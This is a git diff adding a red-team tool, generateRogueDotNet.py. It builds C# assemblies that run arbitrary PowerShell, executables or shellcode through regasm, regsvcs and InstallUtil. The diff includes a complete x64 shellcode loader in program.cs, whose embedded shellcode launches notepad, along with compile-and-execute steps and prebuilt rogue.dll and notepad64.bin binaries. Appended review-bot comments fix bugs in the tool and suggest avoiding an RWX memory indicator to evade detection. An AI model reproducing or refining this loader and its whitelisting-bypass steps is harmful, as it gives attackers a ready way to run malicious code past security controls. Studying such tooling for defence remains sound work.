%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# +# Mariusz B. 
/ mgeeky, +# + +import re +import os +import io +import sys +import gzip +import base64 +import string +import struct +import random +import binascii +import argparse + + +def getCompressedPayload(filePath): + out = io.BytesIO() + encoded = '' + with open(filePath, 'rb') as f: + inp = f.read() + + with gzip.GzipFile(fileobj = out, mode = 'w') as fo: + fo.write(inp) + + encoded = base64.b64encode(out.getvalue()) + + powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( + encoded.decode() + ) + return powershell + +def getSourceFileContents(payload, _format): + launchCode = '' + usings = '' + + if _format == 'exe': + + exeLaunchCode = string.Template(''' + public static void Execute() { + + string payload = "$payload2"; + byte[] decoded = System.Convert.FromBase64String(payload); + + Assembly asm = Assembly.Load(decoded); + MethodInfo method = asm.EntryPoint; + object instance = asm.CreateInstance(method.Name); + method.Invoke(instance, null); + + }''').safe_substitute( + payload2 = base64.b64encode(payload.encode()).decode() + ) + + + launchCode = exeLaunchCode + + elif _format == 'raw': + + foo = str(binascii.hexlify(payload), 'ascii') + fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] + encodedPayload = ' ' + + for i in range(len(fooarr)): + if i % 16 == 0 and i > 0: + encodedPayload += '\n ' + encodedPayload += '{}, '.format(fooarr[i]) + + encodedPayload = encodedPayload.strip()[:-1] + + shellcodeLoader = string.Template(''' + [DllImport("kernel32")] + private static extern IntPtr VirtualAlloc( + IntPtr lpAddress, UIntPtr dwSize, + UInt32 flAllocationType, + UInt32 flProtect + ); + + [DllImport("kernel32")] + private static extern bool VirtualFree( + IntPtr lpAddress, + UInt32 dwSize, + UInt32 dwFreeType + ); + + [DllImport("kernel32")] + private static extern IntPtr 
CreateThread( + UInt32 lpThreadAttributes, + UInt32 dwStackSize, + IntPtr lpStartAddress, + IntPtr param, + UInt32 dwCreationFlags, + ref UInt32 lpThreadId + ); + + [DllImport("kernel32")] + private static extern bool CloseHandle( + IntPtr hHandle + ); + + [DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject( + IntPtr hHandle, + UInt32 dwMilliseconds + ); + + private static UInt32 MEM_COMMIT = 0x1000; + private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; + private static UInt32 MEM_RELEASE = 0x8000; + + public static void Execute() { + + byte[] payload = new byte[$payloadSize] { + $payload2 + }; + + IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + Marshal.Copy(payload, 0, funcAddr, payload.Length); + IntPtr hThread = IntPtr.Zero; + UInt32 threadId = 0; + + hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); + WaitForSingleObject(hThread, 0xFFFFFFFF); + + CloseHandle(hThread); + VirtualFree(funcAddr, 0, MEM_RELEASE); + + }''').safe_substitute( + payload2 = encodedPayload, + payloadSize = len(payload) + ) + + launchCode = shellcodeLoader + + else: + usings += ''' +using System.Management.Automation; +using System.Management.Automation.Runspaces; +''' + powershellLaunchCode = string.Template(''' + public static void Execute() { + + byte[] payload = System.Convert.FromBase64String("$payload2"); + string decoded = System.Text.Encoding.UTF8.GetString(payload); + + Runspace runspace = RunspaceFactory.CreateRunspace(); + runspace.Open(); + + Pipeline pipeline = runspace.CreatePipeline(); + pipeline.Commands.AddScript(decoded); + pipeline.Invoke(); + + runspace.Close(); + }''').safe_substitute( + payload2 = base64.b64encode(payload.encode()).decode() + ) + + launchCode = powershellLaunchCode + + + template = string.Template(''' +using System; +using System.Diagnostics; +using System.Reflection; +using System.Runtime.InteropServices; +using System.EnterpriseServices; +$usings 
+ +/* + Author: Casey Smith, Twitter: @subTee + Customized by: Mariusz B. / mgeeky, + License: BSD 3-Clause + + Step 1: Create Your Strong Name Key -> key.snk + + $key = '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' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + + Step 2: Compile source code: + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs + + Step 3: Execute your payload! + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll + C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll +*/ + +namespace Program +{ + public class Bypass : ServicedComponent + { + public Bypass() + { + } + + // This executes if registration is successful + [ComRegisterFunction] + public static void RegisterClass( string key ) + { + Shellcode.Execute(); + } + + // This executes if registration fails + [ComUnregisterFunction] + public static void UnRegisterClass( string key ) + { + Shellcode.Execute(); + } + } + + [System.ComponentModel.RunInstaller(true)] + public class ForInstallUtil : System.Configuration.Install.Installer + { + // This executes during InstallUtil /U invocation + public override void Uninstall(System.Collections.IDictionary savedState) + { + Shellcode.Execute(); + } + } + + public class Shellcode + { + $launchCode + } +}''').safe_substitute( + launchCode = launchCode, + usings = usings + ) + + return template + +def detectFileIsExe(filePath, forced = False): + first1000 = [] + + with open(filePath, 'rb') as f: + first1000 = f.read()[:1000] + + if not (first1000[0] == 'M' and first1000[1] == 'Z'): + return False + + elfanew = struct.unpack(' + +''') + if len(argv) < 2: + print('Usage: ./generateRogueDotNet.py 
') + sys.exit(-1) + + args = opts(argv) + + _format = 'powershell' + + if args.exe: + if not detectFileIsExe(args.inputFile, args.exe): + sys.stderr.write('[-] File not recognized as PE/EXE.\n\n') + return False + + _format = 'exe' + sys.stderr.write('[+] File recognized as PE/EXE.\n\n') + with open(args.inputFile, 'rb') as f: + payload = f.read() + + elif args.raw: + _format = 'raw' + sys.stderr.write('[+] File specified as raw Shellcode.\n\n') + with open(args.inputFile, 'rb') as f: + payload = f.read() + + else: + sys.stderr.write('[+] Powershell code given.\n') + + if args.inputFile.endswith('.exe'): + return False + + payload = getCompressedPayload(args.inputFile) + + output = getSourceFileContents(payload, _format) + + print(output) + + management = '' + if _format == 'powershell': + management = ' /r:System.Management.Automation.dll' + + commands = ''' + +===================================== + +Step 1: Create Your Strong Name Key -> key.snk + + $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + +Step 2: Compile source code: + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe 
/r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs + +Step 3: Execute your payload! + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll + + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll + + %WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll + %WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll + '''.format(management) + + if 'PROGRAMFILES(X86)' in os.environ: + commands = commands.replace('Framework', 'Framework64') + + sys.stderr.write(commands) + +if __name__ == '__main__': + main(sys.argv) diff --git a/red-teaming/regsvcs/key.snk b/red-teaming/rogue-dot-net/key.snk similarity index 100% rename from red-teaming/regsvcs/key.snk rename to red-teaming/rogue-dot-net/key.snk diff --git a/red-teaming/rogue-dot-net/notepad64.bin b/red-teaming/rogue-dot-net/notepad64.bin new file mode 100644 index 0000000000000000000000000000000000000000..45231ea37e9068d9a9912c6ce4c3301efa8f7d0f GIT binary patch literal 279 zcmez4(fs7YivtV{432@00YQOb9)_1vJ-UMufLH>E6+F6&0zCM)dwKa9p7bz0u*N2_ zhDk@k@!&~bN5+GX-Uc}af>d=o*?2Hs=x*o$8syP>pd=m03+VQcaOrkX@MOI3ILzb! zNyl!J4iCm_P;;OrSUf2G=)>%z!r^LpvGhg+P`wIJeVSu8j|Y$~17tgPvjDYSaEx$_ zh>MH@Qjv~P9?fqQ9E1Kp0CJ){x`keb|Ns9#)?*hV&~^~;=lF3Qhhh;;0{_5W&Keo1OUVv1gBMJfXT Dv0!h| literal 0 HcmV?d00001 diff --git a/red-teaming/regsvcs/program-template.cs b/red-teaming/rogue-dot-net/program-template.cs similarity index 100% rename from red-teaming/regsvcs/program-template.cs rename to red-teaming/rogue-dot-net/program-template.cs diff --git a/red-teaming/rogue-dot-net/program.cs b/red-teaming/rogue-dot-net/program.cs new file mode 100644 index 0000000..2dbdce1 --- /dev/null +++ b/red-teaming/rogue-dot-net/program.cs 
@@ -0,0 +1,141 @@ + +using System; +using System.Diagnostics; +using System.Reflection; +using System.Runtime.InteropServices; +using System.EnterpriseServices; + + +/* + Author: Casey Smith, Twitter: @subTee + Customized by: Mariusz B. / mgeeky, + License: BSD 3-Clause + + Step 1: Create Your Strong Name Key -> key.snk + + $key = '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' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + + Step 2: Compile source code: + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs + + Step 3: Execute your payload! + C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll + C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll + C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll + C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll +*/ + +namespace Program +{ + public class Bypass : ServicedComponent + { + public Bypass() + { + } + + // This executes if registration is successful + [ComRegisterFunction] + public static void RegisterClass( string key ) + { + Shellcode.Execute(); + } + + // This executes if registration fails + [ComUnregisterFunction] + public static void UnRegisterClass( string key ) + { + Shellcode.Execute(); + } + } + + [System.ComponentModel.RunInstaller(true)] + public class ForInstallUtil : System.Configuration.Install.Installer + { + // This executes during InstallUtil /U invocation + public override void Uninstall(System.Collections.IDictionary savedState) + { + Shellcode.Execute(); + } + } + + public class Shellcode + { + + [DllImport("kernel32")] + private static extern IntPtr VirtualAlloc( + IntPtr lpAddress, UIntPtr dwSize, + UInt32 flAllocationType, + UInt32 flProtect + ); + + [DllImport("kernel32")] + private static extern bool VirtualFree( + IntPtr lpAddress, + UInt32 dwSize, + 
UInt32 dwFreeType + ); + + [DllImport("kernel32")] + private static extern IntPtr CreateThread( + UInt32 lpThreadAttributes, + UInt32 dwStackSize, + IntPtr lpStartAddress, + IntPtr param, + UInt32 dwCreationFlags, + ref UInt32 lpThreadId + ); + + [DllImport("kernel32")] + private static extern bool CloseHandle( + IntPtr hHandle + ); + + [DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject( + IntPtr hHandle, + UInt32 dwMilliseconds + ); + + private static UInt32 MEM_COMMIT = 0x1000; + private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; + private static UInt32 MEM_RELEASE = 0x8000; + + public static void Execute() { + + byte[] payload = new byte[279] { + 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, + 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, + 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, + 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, + 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, + 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, + 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, + 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, + 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, + 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, + 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, + 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, + 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 
0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, + 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, + 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, + 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70, + 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00 + }; + + IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + Marshal.Copy(payload, 0, funcAddr, payload.Length); + IntPtr hThread = IntPtr.Zero; + UInt32 threadId = 0; + + hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); + WaitForSingleObject(hThread, 0xFFFFFFFF); + + CloseHandle(hThread); + VirtualFree(funcAddr, 0, MEM_RELEASE); + + } + } +} 
diff --git a/red-teaming/rogue-dot-net/rogue.dll b/red-teaming/rogue-dot-net/rogue.dll new file mode 100644 index 0000000000000000000000000000000000000000..f893649401bb06849c5a47e49f49604379c6c021 GIT binary patch literal 5632 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 Z`W1ZH8SrF&H}9 literal 0 HcmV?d00001
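Review bot: In `main()` of generateRogueDotNet.py the 64-bit fix-up `commands = commands.replace('Framework', 'Framework64')` corrupts the two InstallUtil lines, which already read `Framework64`, turning them into `Framework6464\v2.0.50727\InstallUtil.exe` and `Framework6464\v4.0.30319\InstallUtil.exe`; either write all Step 3 paths with plain `Framework` and let the replace promote them, or do `commands.replace('\\Framework\\', '\\Framework64\\')`. The trigger for that replace is also the wrong signal: `'PROGRAMFILES(X86)' in os.environ` tells you about the machine running the Python generator, not the Windows host where `regasm`/`regsvcs`/`InstallUtil` will be typed, so it should be an explicit `--x64` style switch or the note should say "use Framework64 on 64-bit targets". Separately, `detectFileIsExe()` compares `first1000[0] == 'M' and first1000[1] == 'Z'`; the file is opened with `'rb'`, so under Python 3 those elements are ints and the test is always false, meaning `--exe` can never be accepted; `first1000[:2] == b'MZ'` works on both 2 and 3 (and `f.read(1000)` avoids slurping the whole binary). The `%WINDIR%\...\v2.0.50727\InstallUtil.exe /U rogue.dll` line will not work against a DLL produced by the v4.0.30319 `csc.exe` in Step 2 (the v2 runtime refuses assemblies built for a newer runtime), so either document a v2 build or drop that line. Lastly, the `if args.inputFile.endswith('.exe'): return False` branch exits silently; emit a `[-]` message telling the user to pass `--exe`.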
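Review bot: The header comment in program.cs gives 32-bit paths (`C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe` etc.) while the embedded `payload` is x64 code (REX-prefixed `0x48 0x83 0xe4 0xf0` prologue, 279 bytes, same size as the new notepad64.bin); loading it through the 32-bit `regasm`/`regsvcs` will crash the host process, so the comment should point at `Framework64` or state the bitness requirement. The same comment still says `/out:regsvcs.dll` and `regsvcs.exe regsvcs.dll` although this commit renames everything to `rogue.dll`. In `Shellcode`, the P/Invoke signatures use `UInt32` for values that are pointer-sized natively (`CreateThread` `lpThreadAttributes`/`dwStackSize`, `VirtualFree` `dwSize`); declare them as `IntPtr`/`UIntPtr` so the x64 marshalling is correct rather than accidental. `VirtualAlloc` can return `IntPtr.Zero` and `CreateThread` can return a null handle; neither is checked before `Marshal.Copy` and `WaitForSingleObject`, and allocating `PAGE_EXECUTE_READWRITE` up front is an avoidable RWX indicator when a RW allocation followed by `VirtualProtect` to RX would do. `WaitForSingleObject(hThread, 0xFFFFFFFF)` keeps `regasm`/`regsvcs`/`InstallUtil` alive until the shellcode thread exits, which is fine for notepad but worth a comment for long-running payloads. The `[ComUnregisterFunction]` comment "This executes if registration fails" is misleading: that attribute marks the method run on unregistration, i.e. the `/U` invocations in Step 3. The Step 1 snippet `Set-Content key.snk -Value $Content -Encoding Byte` only works in Windows PowerShell; PowerShell 6+ replaced `-Encoding Byte` with `-AsByteStream`, worth a one-line note.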
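Review bot: rogue.dll (5632 bytes) and notepad64.bin (279 bytes) are committed as opaque binaries, so a reviewer cannot confirm that rogue.dll is the output of the program.cs in this same commit, and a prebuilt DLL with embedded shellcode is exactly what scanners flag on clone. Prefer regenerating it from build.ps1 at use time, and record the build command and a SHA-256 of the artifact in rogue-dot-net/README.md so the checked-in file can be verified against the source.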